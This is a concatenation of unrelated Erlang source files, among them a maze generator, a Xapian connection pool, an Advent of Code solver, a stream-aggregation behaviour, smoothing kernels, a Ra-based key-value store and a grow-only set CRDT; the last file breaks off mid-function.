%% @doc
%% Creates Empty maze with provided size
%%
%% @spec createMaze(Height, Width) -> {Maze, WallsNotInMaze}.
%% @end
%%--------------------------------------------------------------------
createMaze(Height, Width) ->
GenPassagePos = {rand:uniform(Width - 1), rand:uniform(Height - 1)},
Maze = #maze{height = Height, width = Width, passages = #{GenPassagePos => true}},
WallsNotInMaze = insertAdjacentPositionsIfValid(Maze#maze.height, Maze#maze.width, [], GenPassagePos),
{maze_not_finished_generating, {Maze, WallsNotInMaze}}.
%%--------------------------------------------------------------------
%% @doc
%% Does a Randomized Prim's algorithm step
%% described here: https://en.wikipedia.org/wiki/Maze_generation_algorithm#Randomized_Prim's_algorithm
%%
%% @spec step({maze_finished_or_not_atom, {Maze, WallsNotInMaze}}) -> {Maze, WallsNotInMaze}.
%% @end
%%--------------------------------------------------------------------
step({_maze_finished_or_not_atom, {Maze, []}}) ->
{finished_generation, {Maze, []}};
step({maze_not_finished_generating, {Maze, WallsNotInMaze}}) ->
GenPassagePos = lists:nth(rand:uniform(length(WallsNotInMaze)), WallsNotInMaze),
ReturnStruct = case returnPositionIfOneNeighbour(Maze#maze.passages, GenPassagePos) of
more_than_one_neighbouring_passage ->
{Maze, lists:delete(GenPassagePos, WallsNotInMaze)};
{badmap, Passages} ->
erlang:display("Passages should be map, got " + Passages),
{Maze, lists:delete(GenPassagePos, WallsNotInMaze)};
{NeighUniqPosX, NeighUniqPosY} ->
%% Calculate position that passage lead to %%
CellWhereNewPassageLeads = {
2 * element(1, GenPassagePos) - NeighUniqPosX,
2 * element(2, GenPassagePos) - NeighUniqPosY
},
ReturnMaze = Maze#maze{passages = maps:merge(
Maze#maze.passages,
#{GenPassagePos => true, CellWhereNewPassageLeads => true}
)},
WallsWithAdjacent = insertAdjacentPositionsIfValid(Maze#maze.height, Maze#maze.width, WallsNotInMaze, CellWhereNewPassageLeads),
{ReturnMaze, lists:delete(GenPassagePos, WallsWithAdjacent)}
end,
{maze_not_finished_generating, ReturnStruct }.
%%%===================================================================
%%% Internal functions
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Starts the server
%%
%% @spec mapIfPositionIsInMap(Passages, Position) -> Position |
%% false |
%% {badmap, Map}
%% @end
%%--------------------------------------------------------------------
mapIfPositionIsInMap(Passages, Position) ->
case maps:is_key(Position, Passages) of
true -> Position;
Res -> Res
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% We check list of results provided from mapIfPositionIsInMap funtion and we check
%%
%% @spec returnPositionIfOne(ListOfResults, Position) -> more_than_one_neighbouring_passage |
%% {badmap, Passages} |
%% PositionTuple
%% @end
%%--------------------------------------------------------------------
returnPositionIfOne([{badmap, Passages} | _T], _) -> {badmap, Passages};
returnPositionIfOne([], Position) when is_tuple(Position) -> Position;
returnPositionIfOne([H | T], Position) when is_tuple(H) and is_tuple(Position) ->
more_than_one_neighbouring_passage;
returnPositionIfOne([H | T], position_not_found_yet) when is_tuple(H) ->
returnPositionIfOne(T, H);
returnPositionIfOne([_H | T], Passed) ->
returnPositionIfOne(T, Passed).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% If position provided has one neighbour it return position of that neighbour, otherwise
%% informing atom
%%
%% @spec returnPositionIfOneNeighbour(Passages, Position) -> more_than_one_neighbouring_passage |
%% {badmap, Passages} |
%% PositionTuple
%% @end
%%--------------------------------------------------------------------
returnPositionIfOneNeighbour(Passages, Position) ->
ListOfResults = forEveryPosCallMapIfPosInMap(Passages, generateAdjacentPositions(Position)),
returnPositionIfOne(ListOfResults, position_not_found_yet).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper method that calls for every provided position calls mapIfPositionIsInMap
%% and accumulates result in list
%%
%% @spec forEveryPosCallMapIfPosInMap(Passages, Positions) -> ListOfResults
%% @end
%%--------------------------------------------------------------------
forEveryPosCallMapIfPosInMap(_Passages, []) -> [];
forEveryPosCallMapIfPosInMap(Passages, [PosH | PosT]) ->
[mapIfPositionIsInMap(Passages, PosH) | forEveryPosCallMapIfPosInMap(Passages, PosT)].
%%--------------------------------------------------------------------
%% @private
%% @doc
%% If position is within grid inserts it to provided list
%%
%% @spec ifValidInsert(Walls, Position, Height, Width) -> NewWalls
%% @end
%%--------------------------------------------------------------------
ifValidInsert(Walls, {X, Y}, Height, Width) when X >= 0, Y >= 0, X < Width, Y < Height ->
[{X, Y} | Walls];
ifValidInsert(Walls, {_X, _Y}, _Height, _Width) -> Walls.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% For for adjacent positions to provided position calls validateAndInsert,
%% saves and returns result
%%
%% @spec insertAdjacentPositionsIfValid(Maze, WallsNotInMaze, PositionTuple) -> UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
insertAdjacentPositionsIfValid(Height, Width, WallsNotInMaze, Position) ->
forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, generateAdjacentPositions(Position)).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper method that calls for every provided position validateAndInsert function
%%
%% @spec forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, NeighbouringPositions) ->
%% UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
forEveryPosCallCalAndIns(_Height, _Width, WallsNotInMaze, []) ->
WallsNotInMaze;
forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, [NeighbouringH | NeighbouringT]) ->
NewNotInMaze = ifValidInsert(WallsNotInMaze, NeighbouringH, Height, Width),
forEveryPosCallCalAndIns(Height, Width, NewNotInMaze, NeighbouringT).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Generates list of positions adjacent to provided position
%%
%% @spec insertAdjacentPositionsIfValid(Maze, WallsNotInMaze, PositionTuple) -> UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
generateAdjacentPositions({X, Y}) ->
[
{X + 1, Y},
{X - 1, Y},
{X, Y + 1},
{X, Y - 1}
]. | maze_api/apps/maze_api/src/maze_generator.erl | 0.526099 | 0.501892 | maze_generator.erl | starcoder |
%% This module provides `start_link' function for Poolboy.
%% This module is used for grouping a set of __readers__.
-module(xapian_pool).
-define(SERVER, xapian_server).
-define(WORKER, ?MODULE).
-define(SUPERVISOR, xapian_pool_sup).
-ifdef(TEST).
-import(xapian_helper, [testdb_path/1]).
-include_lib("eunit/include/eunit.hrl").
-define(POOL, ?MODULE).
-record(test_pool, {names, pool_pids}).
-endif.
%% ------------------------------------------------------------------
%% Export
%% ------------------------------------------------------------------
%% API
-export([ open/3
, checkout/2
, close/1]).
%% Callbacks
-export([start_link/1]).
%% ------------------------------------------------------------------
%% Types
%% ------------------------------------------------------------------
-type pool_param() ::
{name, atom() | {local, atom()} | {global, atom()}}
| {worker_module, atom()}
| {size, non_neg_integer()}
| {max_overflow, non_neg_integer()}.
%% ------------------------------------------------------------------
%% API
%% ------------------------------------------------------------------
%% @doc Create a pool.
%% For `PoolParams' see https://github.com/devinus/poolboy
%%
%% <ul> <li>
%% `name': the pool name
%% </li><li>
%% `worker_module': the module that represents the workers
%% </li><li>
%% `size': maximum pool size
%% </li><li>
%% `max_overflow': maximum number of workers created if pool is empty
%% </li></ul>
%% @see xapian_server:open/3
-spec open([pool_param()], iolist(), [term()]) -> {ok, pid()} | {error, term}.
open(PoolParams, Path, Params) ->
Name = proplists:get_value(name, PoolParams),
FixedNameParam =
if
is_atom(Name), Name =/= undefined ->
[{name, {local, Name}}];
true ->
[]
end,
ExtPoolParams = FixedNameParam ++ PoolParams ++
[ {worker_module, ?WORKER}
, {worker_params, [Path, Params]}],
xapian_pool_sup:start_pool(ExtPoolParams).
%% @doc Destroy the pool asynchronously.
-spec close(atom() | pid()) -> term().
close(PoolName) ->
poolboy:stop(PoolName).
%% @doc Call the function `Fun' with the list of servers from pools,
%% regestered under the `PoolNames' names, as a parameter.
-spec checkout(PoolNames, Fun) -> Result when
PoolNames :: [atom() | pid()],
Fun :: fun((Servers) -> Result),
Servers :: [xapian_type:x_server()],
Result :: term().
checkout(PoolNames, Fun) ->
PoolWorkers =
[poolboy:checkout(PoolName) || PoolName <- PoolNames],
try
Fun(PoolWorkers)
after
lists:zipwith(fun(Name, Worker) ->
poolboy:checkin(Name, Worker)
end, PoolNames, PoolWorkers)
end.
%% @doc It is a callback for Poolboy.
start_link(Args) ->
[Path, Params] = proplists:get_value(worker_params, Args),
?SERVER:start_link(Path, Params).
%% ------------------------------------------------------------------
%% Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
try_start_application() ->
case application:start(xapian) of
ok -> ok;
{error,{already_started,xapian}} ->
ok
end.
anonym_pool_test_() ->
try_start_application(),
%% The database path is "priv/Name".
Name = 'anonym_pool',
create_database(Name),
%% Create an anonymous pool
{ok, Pool} = ?POOL:open([], testdb_path(Name), []),
IsAlive = is_process_alive(Pool),
?POOL:close(Pool),
MonRef = erlang:monitor(process, Pool),
IsAliveAfterClose =
receive
%% Error in the transaction body.
{'DOWN', MonRef, process, Pool, _Reason} ->
false
after 500 ->
true
end,
[ ?_assert(IsAlive), ?_assertNot(IsAliveAfterClose) ].
pool_test_() ->
try_start_application(),
{foreach,
fun pool_setup/0,
fun pool_clean/1,
[ fun access_by_name_case/1
, fun access_by_pid_case/1
]}.
pool_setup() ->
Names = [pool1, pool2, pool3],
%% Create DBs
[create_database(Name) || Name <- Names],
%% Create pools of readers
Workers =
[begin
{ok, Pid} = ?POOL:open([{name, Name}], testdb_path(Name), []),
Pid
end || Name <- Names],
#test_pool{names=Names, pool_pids=Workers}.
pool_clean(#test_pool{names=Names}) ->
[ok = ?POOL:close(Name) || Name <- Names],
ok.
access_by_pid_case(#test_pool{pool_pids=Pools}) ->
Fun = fun([W1, W2, W3] = Workers) ->
lists:all(fun erlang:is_pid/1, Workers)
end,
Result = ?POOL:checkout(Pools, Fun),
[ ?_assertEqual(Result, true)
].
access_by_name_case(#test_pool{names=Pools}) ->
[].
create_database(Name) ->
Modes = [write, create, overwrite],
{ok, Server} = xapian_server:open(testdb_path(Name), Modes),
xapian_server:close(Server).
-endif. | src/xapian_pool.erl | 0.519521 | 0.443299 | xapian_pool.erl | starcoder |
-module(problem2017_09).
-export([solve1/1, solve2/1]).
-type counter() :: non_neg_integer().
-type parser_state() :: bang | garbage | { group, counter() }.
-type state() :: { [ parser_state() ], counter(), counter() }.
-spec process( char(), state() ) -> state().
process( _, { [ bang | States ], S, G } ) ->
{ States, S, G };
process( $!, { States, S, G } ) ->
{ [ bang | States ], S, G };
process( $>, { [ garbage | States ], S, G } ) ->
{ States, S, G };
process( _, { [ garbage | _ ] = States, S, G } ) ->
{ States, S, G + 1 };
process( $<, { States, S, G } ) ->
{ [ garbage | States ], S, G };
process( ${, { [ { group, N } | _ ] = States, S, G } ) ->
{ [ { group, N + 1 } | States ], S, G };
process( $}, { [ { group, N } | States ], S, G } ) ->
{ States, S + N, G };
process( $,, States ) ->
States.
-spec solve( string() ) -> state().
solve( Input ) ->
lists:foldl( fun process/2, { [ { group, 0 } ], 0, 0 }, Input ).
-spec solve1( string() ) -> counter().
solve1( Input ) ->
{ _, Score, _ } = solve( Input ),
Score.
-spec solve2( string() ) -> counter().
solve2( Input ) ->
{ _, _, Garbage } = solve( Input ),
Garbage.
-include_lib("eunit/include/eunit.hrl").
solve1_test_() ->
[
?_assertEqual( 1, solve1( "{}" ) ),
?_assertEqual( 6, solve1( "{{{}}}" ) ),
?_assertEqual( 5, solve1( "{{},{}}" ) ),
?_assertEqual( 16, solve1( "{{{},{},{{}}}}" ) ),
?_assertEqual( 1, solve1( "{<a>,<a>,<a>,<a>}" ) ),
?_assertEqual( 9, solve1( "{{<ab>},{<ab>},{<ab>},{<ab>}}" ) ),
?_assertEqual( 9, solve1( "{{<!!>},{<!!>},{<!!>},{<!!>}}" ) ),
?_assertEqual( 3, solve1( "{{<a!>},{<a!>},{<a!>},{<ab>}}" ) )
].
solve2_test_() ->
[
?_assertEqual( 0, solve2( "<>" ) ),
?_assertEqual( 17, solve2( "<random characters>" ) ),
?_assertEqual( 3, solve2( "<<<<>" ) ),
?_assertEqual( 2, solve2( "<{!>}>" ) ),
?_assertEqual( 0, solve2( "<!!>" ) ),
?_assertEqual( 0, solve2( "<!!!>>" ) ),
?_assertEqual( 10, solve2( "<{o\"i!a,<{i<a>" ) )
]. | src/2017/problem2017_09.erl | 0.52829 | 0.612802 | problem2017_09.erl | starcoder |
%%%===================================================================
%%% @copyright 2019 Klarna Bank AB (publ)
%%%
%%% @doc This module implements a stateful stream processing node for
%%% many-into-one transformations.
%%%
%%% One has to create a callback module with `kflow_gen_aggregate'
%%% behavior.
%%%
%%% `init' and `terminate' callbacks are similar to those in {@link
%%% kflow_gen_map} or {@link kflow_gen_filter} behaviors.
%%%
%%% == Consuming upstream messages ==
%%%
%%% `in' callback is invoked for each incoming message from the
%%% upstream. It takes 4 arguments:
%%%
%%% <ol><li>Offset of a message</li>
%%%
%%% <li>Message itself</li>
%%%
%%% <li>State of the callback module. This state is created in `init'
%%% callback and can be mutated in the callbacks.</li>
%%%
%%% <li>Last argument is initial configuration of the aggregator
%%% (constant)</li></ol>
%%%
%%% Return value should be a tuple `{Flush, NextState}' where `Flush'
%%% can be atoms `keep', `flush' or `reject'.
%%%
%%% `keep' means that the aggregator should keep collecting upstream
%%% messages without producing anything downstream.
%%%
%%% `flush' means that the aggregator is ready to produce a message
%%% downstream.
%%%
%%% `reject' means the last upstream message was incompatible with the
%%% data that had been aggregated so far. (E.g. schema of the data was
%%% different). In this case <i>previous</i> state is flushed and the
%%% last message is replayed from blank state.
%%%
%%% == Producing messages downstream ==
%%%
%%% `out' callback is used to produce a message downstream. It is
%%% invoked when `in' callback returns `flush' or `reject', or when
%%% flush is implicitly requested by low-level control logic. It takes
%%% two arguments: first one is current state of the callback module
%%% and the second one is initial configuration.
%%%
%%% It should output a tuple `{ok | exit, DownstreamMessage, NextState}'
%%% or an atom `keep'.
%%%
%%% Returning `{ok, Msg, NextState}' will result in sending `Msg'
%%% downstream, and waiting for new messages with state `NextState'.
%%%
%%% Returning `{exit, Msg, NextState}' will result in sending `Msg'
%%% downstream, calling `terminate' callback, if it is defined by the
%%% user CBM, and then forgetting about the state of the user CBM for
%%% the route. This is useful when the number of routes is unlimited.
%%%
%%% If user CBM returns `keep', then gen_aggregate will keep the state
%%% and won't produce anything downstream. This is useful to avoid
%%% situation when `flush' is requested by some external logic, but
%%% user CBM doesn't want to to flush half-finished data.
%%%
%%% == Example ==
%%% ```
%%% -module(my_aggregate).
%%%
%%% -behavior(kflow_gen_aggregate).
%%%
%%% -export([init/1, in/4, out/2, terminate/1]).
%%%
%%% init(_Config) ->
%%% [].
%%%
%%% in(Offset, Message, State, Config) ->
%%% N = maps:get(buffer_size, Config),
%%% Flush = if length(State) >= N ->
%%% flush;
%%% true ->
%%% keep
%%% end,
%%% {Flush, [Message|State]}.
%%%
%%% out(State, _Config) ->
%%% Output = lists:reverse(State),
%%% NewState = [],
%%% {ok, Output, NewState}.
%%%
%%% terminate(_State) ->
%%% ok.
%%%
%%% '''
%%% @end
%%%===================================================================
-module(kflow_gen_aggregate).
-behavior(kflow_gen).
-include("kflow_int.hrl").
-export([init/2, handle_message/3, handle_flush/2, terminate/2]).
-type flush() :: keep % Keep accumulating the messages
| flush % Flush the accumulated messages
| reject. % Flush the messages accumulated before the last
% one and replay it with an empty buffer
-callback init(_Config) -> _State.
-callback in(kflow:offset(), _Msg, State, _Config) -> {flush(), State}.
-callback out(State, _Config) -> {ok | exit, _Msg, State}
| keep
.
-callback terminate(_State, _Config) -> _.
-optional_callbacks([init/1, terminate/2]).
%% @private
init(NodeId, Config) ->
kflow_multistate:wrap(NodeId, kflow_gen_aggregate_impl, Config).
%% @private
handle_message(Msg, State, Config) ->
kflow_multistate:handle_message(Msg, State, Config).
%% @private
handle_flush(State, Config) ->
kflow_multistate:handle_flush(State, Config).
%% @private
terminate(State, Config) ->
kflow_multistate:terminate(State, Config). | src/framework/kflow_gen_aggregate.erl | 0.547222 | 0.562717 | kflow_gen_aggregate.erl | starcoder |
% ==============================================================================
% Smoothing Kernels
% ==============================================================================
%% Collection of smoothing kernels; each takes a numeric X and returns a
%% float density value, zero outside the support [-1, 1] (except the
%% Gaussian, whose support is the whole real line).
-module(kernels).
%% cosine/1 is implemented and unit-tested below but was missing from the
%% export list, which made it unreachable for callers and triggers an
%% "unused function" warning in non-TEST builds.
-export([boxcar/1, gaussian/1, epanechnikov/1, tricube/1, triangular/1, cosine/1]).
-define(SQR(X), ((X)*(X))).
-define(CUBE(X), ((X)*(X)*(X))).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
%% Assert X and Y agree to D decimal digits (absolute tolerance 10^-D).
-define(assertEqualDigits(X,Y,D), ?assert(abs((X)-(Y)) < math:pow(10,-(D)))).
-endif.
% ------------------------------------------------------------------------------
% Indicator function
% ------------------------------------------------------------------------------
% Indicator of the closed interval [-1, 1]: 1.0 inside, 0.0 outside.
% For numbers the guard -1 =< X =< 1 is exactly abs(X) =< 1; any
% non-number sorts above all numbers in the term order, fails X =< 1,
% and falls through to 0.0 — the same result a failing abs/1 guard gives.
i(X) when X >= -1, X =< 1 -> 1.0;
i(_) -> 0.0.
% ------------------------------------------------------------------------------
% Boxcar Kernel
% ------------------------------------------------------------------------------
% Boxcar (uniform) kernel: constant density 1/2 on the support [-1, 1],
% zero elsewhere.
boxcar(X) ->
  Support = i(X),
  0.5 * Support.
% ------------------------------------------------------------------------------
% Gaussian Kernel
% ------------------------------------------------------------------------------
% Gaussian kernel: phi(X) = exp(-X^2/2) / sqrt(2*pi); the literal is
% 1/sqrt(2*pi) precomputed.
gaussian(X) ->
  Exponent = -0.5 * (X * X),
  0.398942280401432678 * math:exp(Exponent).
% ------------------------------------------------------------------------------
% Epanechnikov Kernel
% ------------------------------------------------------------------------------
% Epanechnikov kernel: 3/4 * (1 - X^2) on [-1, 1], zero elsewhere.
epanechnikov(X) ->
  Parabola = 1 - X * X,
  0.75 * Parabola * i(X).
% ------------------------------------------------------------------------------
% Tricube Kernel
% ------------------------------------------------------------------------------
% Tricube kernel: (70/81) * (1 - |X|^3)^3 on [-1, 1], zero elsewhere;
% the literal is 70/81 precomputed (cf. the eunit test below asserting
% 70/81 at X = 0).
tricube(X) ->
  A = abs(X),
  Inner = 1 - A * A * A,
  0.8641975308641975 * (Inner * Inner * Inner) * i(X).
% ------------------------------------------------------------------------------
% Triangular Kernel
% ------------------------------------------------------------------------------
% Triangular kernel: 1 - |X| on [-1, 1], zero elsewhere.
triangular(X) ->
  Weight = 1 - abs(X),
  Weight * i(X).
% ------------------------------------------------------------------------------
% Cosine Kernel
% ------------------------------------------------------------------------------
% Cosine kernel: (pi/4) * cos(pi*X/2) on [-1, 1], zero elsewhere; the
% literals are pi/4 and pi/2 precomputed.
cosine(X) ->
  HalfPi = 1.570796326794897,
  0.7853981633974483 * math:cos(HalfPi * X) * i(X).
% ==============================================================================
% EUnit tests
% ------------------------------------------------------------------------------
-ifdef(TEST).
%% Spot-checks every kernel at interior points, the support boundary and
%% points outside the support. Expected floats are exact IEEE doubles of
%% the computed values.
indicator_test() ->
  ?assertEqual(1.0, i(1.0)),
  ?assertEqual(1.0, i(0.0)),
  ?assertEqual(1.0, i(0.5)),
  ?assertEqual(1.0, i(-0.5)),
  ?assertEqual(0.0, i(10.0)).
boxcar_test() ->
  ?assertEqual(0.5, boxcar(1.0)),
  ?assertEqual(0.5, boxcar(0.0)),
  ?assertEqual(0.5, boxcar(0.5)),
  ?assertEqual(0.5, boxcar(-0.5)),
  ?assertEqual(0.0, boxcar(10.0)),
  ?assertEqual(0.0, boxcar(-1.01)).
gaussian_test() ->
  ?assertEqual(0.24197072451914337, gaussian(1.0)),
  ?assertEqual(0.3989422804014327, gaussian(0.0)),
  ?assertEqual(0.3520653267642995, gaussian(0.5)),
  ?assertEqual(0.3520653267642995, gaussian(-0.5)),
  ?assertEqual(7.69459862670642e-23, gaussian(10.0)),
  ?assertEqual(0.23955109772801336, gaussian(-1.01)).
epanechnikov_test() ->
  ?assertEqual(0.0, epanechnikov(1.0)),
  ?assertEqual(0.75, epanechnikov(0.0)),
  ?assertEqual(0.5625, epanechnikov(0.5)),
  ?assertEqual(0.5625, epanechnikov(-0.5)),
  ?assertEqual(0.0, epanechnikov(10.0)),
  ?assertEqual(0.0, epanechnikov(-1.01)).
tricube_test() ->
  %% 70/81 is the exact tricube normalization constant at X = 0.
  ?assertEqual(0.0, tricube(1.0)),
  ?assertEqual(70/81, tricube(0.0)),
  ?assertEqual(0.5789448302469136, tricube(0.5)),
  ?assertEqual(0.5789448302469136, tricube(-0.5)),
  ?assertEqual(0.0, tricube(10.0)),
  ?assertEqual(0.0, tricube(-1.01)).
triangular_test() ->
  ?assertEqual(0.0, triangular(1.0)),
  ?assertEqual(1.0, triangular(0.0)),
  ?assertEqual(0.5, triangular(0.5)),
  ?assertEqual(0.5, triangular(-0.5)),
  ?assertEqual(0.0, triangular(10.0)),
  ?assertEqual(0.0, triangular(-1.01)).
cosine_test() ->
  %% cos(pi/2) is not exactly zero in floating point, so the boundary
  %% value is compared to 14 digits rather than exactly.
  ?assertEqualDigits(0.0, cosine(1.0), 14),
  ?assertEqual(0.7853981633974483, cosine(0.0)),
  ?assertEqual(0.5553603672697957, cosine(0.5)),
  ?assertEqual(0.5553603672697957, cosine(-0.5)),
  ?assertEqual(0.0, cosine(10.0)),
  ?assertEqual(0.0, cosine(-1.01)).
-endif.
%% Copyright (c) 2018 Pivotal Software Inc, All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
-module(ra_kv_store_app).
-behaviour(application).
-export([start/2, connect_nodes/1, connect_node/1]).
-export([stop/1]).
%% Block until every node in the list answers net_kernel:connect_node/1
%% with true. Failures are retried forever with a 1-second pause, keeping
%% the failing node at the head of the retry list.
%% NOTE(review): net_kernel:connect_node/1 can also return `ignored' when
%% the local node is not alive; that value would crash the case below —
%% confirm the caller guarantees distribution is started.
wait_for_nodes([]) ->
    error_logger:info_msg("All erlang nodes connected~n", []),
    ok;
wait_for_nodes([Node | Rem] = AllNodes) ->
    case net_kernel:connect_node(Node) of
        true ->
            %% we're connected, great
            wait_for_nodes(Rem);
        false ->
            error_logger:info_msg("Could not connect ~w. Sleeping...~n", [Node]),
            %% we could not connect, sleep a bit and recurse
            timer:sleep(1000),
            wait_for_nodes(AllNodes)
    end.
%% Application start callback.
%% Flow: read configuration, start Ra, then either restart this node's
%% existing Ra server (restart_ra_cluster = true) or — on the
%% lexicographically smallest node only — declare a fresh cluster once
%% every peer node is reachable. Finally, schedule periodic
%% reconnection of all nodes and start the cowboy HTTP endpoint.
start(_Type, _Args) ->
    %% Servers is a list of {ServerReference, Node} pairs.
    {ok, Servers} = application:get_env(ra_kv_store, nodes),
    Nodes = [N || {_, N} <- Servers],
    {ok, ServerReference} = application:get_env(ra_kv_store, server_reference),
    logger:set_primary_config(level, all),
    ClusterId = <<"ra_kv_store">>,
    Config = #{},
    Machine = {module, ra_kv_store, Config},
    ok = ra:start(),
    case application:get_env(ra_kv_store, restart_ra_cluster) of
        {ok, true} ->
            %% Node already has persisted Ra state: restart its server.
            Node = {ServerReference, node()},
            error_logger:info_msg("Restarting RA node ~p~n", [Node]),
            ok = ra:restart_server(Node);
        {ok, false} ->
            %% Fresh deployment: exactly one node (the smallest) declares
            %% the cluster so it is declared only once.
            [N | _] = lists:usort(Nodes),
            case N == node() of
                true ->
                    %% wait for all nodes to come online
                    ok = wait_for_nodes(Nodes),
                    %% only the smallest node declares a cluster
                    %% (the 2s pause presumably lets peers finish their
                    %% own ra:start/0 — TODO confirm)
                    timer:sleep(2000),
                    {ok, Started, Failed} = ra:start_cluster(ClusterId, Machine, Servers),
                    case length(Started) == length(Servers) of
                        true ->
                            %% all started
                            ok;
                        false ->
                            %% Partial start is only logged, not fatal.
                            error_logger:info_msg("RA cluster failures ~w",
                                [Failed]),
                            ok
                    end;
                false ->
                    ok
            end,
            ok
    end,
    % to make sure nodes are always connected
    {ok, ReconnectInterval} = application:get_env(ra_kv_store, node_reconnection_interval),
    {ok, _ } = timer:apply_interval(
        ReconnectInterval,
        ?MODULE, connect_nodes, [Servers]),
    %% HTTP API: one route, the key is a path segment.
    Dispatch = cowboy_router:compile([
        {'_', [{"/:key", ra_kv_store_handler, [{server_reference, ServerReference}]}]}
    ]),
    {ok, Port} = application:get_env(ra_kv_store, port),
    {ok, _} = cowboy:start_clear(kv_store_http_listener,
        [{port, Port}],
        #{env => #{dispatch => Dispatch}}
    ),
    ra_kv_store_sup:start_link().
%% Application stop callback: nothing to clean up.
stop(_State) ->
    ok.
%% Re-establish distribution to every configured {_, Node} pair; invoked
%% periodically via timer:apply_interval/4 from start/2.
connect_nodes(Nodes) ->
    error_logger:info_msg("Reconnecting nodes ~p~n", [Nodes]),
    lists:foreach(fun ra_kv_store_app:connect_node/1, Nodes).
%% Connect to a single node; the first tuple element (the Ra server
%% reference) is irrelevant here.
connect_node({_, Node}) ->
    net_kernel:connect_node(Node).
%%
%% Copyright (c) 2015-2016 <NAME>. All Rights Reserved.
%% Copyright (c) 2007-2012 Basho Technologies, Inc. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc GSet CRDT: grow only set.
%%
%% @reference <NAME>, <NAME>, and <NAME>
%% Delta State Replicated Data Types (2016)
%% [http://arxiv.org/pdf/1603.01529v1.pdf]
%%
%% @reference <NAME>
%% delta-enabled-crdts C++ library
%% [https://github.com/CBaquero/delta-enabled-crdts]
-module(state_gset).
-author("<NAME> <<EMAIL>>").
-behaviour(type).
-behaviour(state_type).
-define(TYPE, ?MODULE).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([new/0, new/1]).
-export([mutate/3, delta_mutate/3, merge/2]).
-export([query/1, equal/2, is_bottom/1,
is_inflation/2, is_strict_inflation/2,
irreducible_is_strict_inflation/2]).
-export([join_decomposition/1, delta/2, digest/1]).
-export([encode/2, decode/2]).
-export_type([state_gset/0, state_gset_op/0]).
-opaque state_gset() :: {?TYPE, payload()}.
-type payload() :: ordsets:ordset(any()).
-type element() :: term().
-type state_gset_op() :: {add, element()}.
%% @doc Create a new, empty `state_gset()'
-spec new() -> state_gset().
new() ->
    {?TYPE, ordsets:new()}.
%% @doc Create a new, empty `state_gset()'
%%      Only the empty argument list is accepted (the state_type
%%      constructor convention); GSets take no construction arguments.
-spec new([term()]) -> state_gset().
new([]) ->
    new().
%% @doc Mutate a `state_gset()'.
%%      Delegates to state_type:mutate/3, which composes
%%      delta_mutate/3 with merge/2.
-spec mutate(state_gset_op(), type:id(), state_gset()) ->
    {ok, state_gset()}.
mutate(Op, Actor, {?TYPE, _GSet}=CRDT) ->
    state_type:mutate(Op, Actor, CRDT).
%% @doc Delta-mutate a `state_gset()'.
%%      Only `{add, element()}' is supported; the replica id is ignored.
%%      Produces a minimal delta: a singleton `state_gset()' carrying the
%%      new element, or the empty (bottom) `state_gset()' when the
%%      element is already present.
-spec delta_mutate(state_gset_op(), type:id(), state_gset()) ->
    {ok, state_gset()}.
delta_mutate({add, Elem}, _Actor, {?TYPE, GSet}) ->
    Delta =
        case ordsets:is_element(Elem, GSet) of
            true -> ordsets:new();
            false -> ordsets:from_list([Elem])
        end,
    {ok, {?TYPE, Delta}}.
%% @doc Returns the value of the `state_gset()'.
%%      This value is a set with all the elements in the `state_gset()',
%%      converted from the ordset payload to a `sets:set()'.
-spec query(state_gset()) -> sets:set(element()).
query({?TYPE, GSet}) ->
    sets:from_list(GSet).
%% @doc Merge two `state_gset()'.
%%      The result carries the set union of the two payloads.
-spec merge(state_gset(), state_gset()) -> state_gset().
merge({?TYPE, Left}, {?TYPE, Right}) ->
    {?TYPE, ordsets:union(Left, Right)}.
%% @doc Equality for `state_gset()'.
-spec equal(state_gset(), state_gset()) -> boolean().
equal({?TYPE, GSet1}, {?TYPE, GSet2}) ->
    ordsets_ext:equal(GSet1, GSet2).
%% @doc Check if a GSet is bottom (i.e. empty; a GSet only grows).
-spec is_bottom(state_gset()) -> boolean().
is_bottom({?TYPE, GSet}) ->
    ordsets:size(GSet) == 0.
%% @doc Given two `state_gset()', check if the second is an inflation
%%      of the first.
%%      The second `state_gset()' is an inflation if the first set is
%%      a subset of the second.
-spec is_inflation(state_gset(), state_gset()) -> boolean().
is_inflation({?TYPE, GSet1}, {?TYPE, GSet2}) ->
    ordsets:is_subset(GSet1, GSet2);
%% @todo get back here later
%% NOTE(review): this clause compares a cardinality bound against the
%% set size; it does not match the declared spec — confirm intent.
is_inflation({cardinality, Value1}, {?TYPE, _}=GSet) ->
    Value2 = query(GSet),
    sets:size(Value2) >= Value1.
%% @doc Check for strict inflation (inflation and not equal), delegated
%%      to the generic state_type implementation.
-spec is_strict_inflation(state_gset(), state_gset()) -> boolean().
is_strict_inflation({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
